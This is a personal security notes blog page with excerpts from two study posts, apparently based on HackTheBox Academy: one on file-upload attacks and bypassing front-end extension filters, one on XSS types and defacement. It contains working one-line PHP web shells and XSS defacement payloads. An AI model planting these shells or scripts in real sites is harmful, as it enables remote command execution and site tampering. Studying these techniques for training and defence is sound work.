Notes Site.
post @ 2024-10-14

Web Shell

Php

1
2
3
4
5
<?php eval($_REQUEST['cmd']);?>  
<?php system($_REQUEST['cmd']); ?>

<?=eval($_REQUEST['cmd']);?>
<?=$_GET[0]($_REQUEST[1]);?>

Bypassing Filters

前端过滤器

1
<input type="file" name="uploadFile" id="uploadFile" onchange="checkFile(this)" accept=".jpg,.jpeg,.png">
1
2
3
4
5
6
7
8
9
function checkFile(File) {  
...SNIP...
if (extension !== 'jpg' && extension !== 'jpeg' && extension !== 'png') {
$('#error_message').text("Only images are allowed!");
File.form.reset();
$("#submit").attr("disabled", true);
...SNIP...
}
}

后端过滤器

黑名单过滤

SecLists web-extensions

Read More
post @ 2024-10-12

XSS 漏洞主要有三种类型:

Type Description
Stored (Persistent) XSS 最严重的 XSS 类型,发生在用户输入存储在后端数据库并在检索时显示(例如,帖子或评论)时
Reflected (Non-Persistent) XSS 用户输入经过后端服务器处理后显示在页面上,但未被存储(例如搜索结果或错误信息)时发生
DOM-based XSS 另一种非持久性 XSS 类型,当用户输入直接显示在浏览器中并完全在客户端处理,而无需到达后端服务器(例如,通过客户端 HTTP 参数或锚标记)时发生

污染页面元素

更改背景

1
2
3
4
5
<script>document.body.style.background = "#141d2b"</script>  

# or

<script>document.body.style.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

更改标题

1
<script>document.title = 'HackTheBox Academy'</script>

更改文本

1
2
3
4
5
document.getElementById("todo").innerHTML = "New Text"  

# or

document.getElementsByTagName('body')[0].innerHTML = "New Text"

 XSS payload

Read More
⬆︎TOP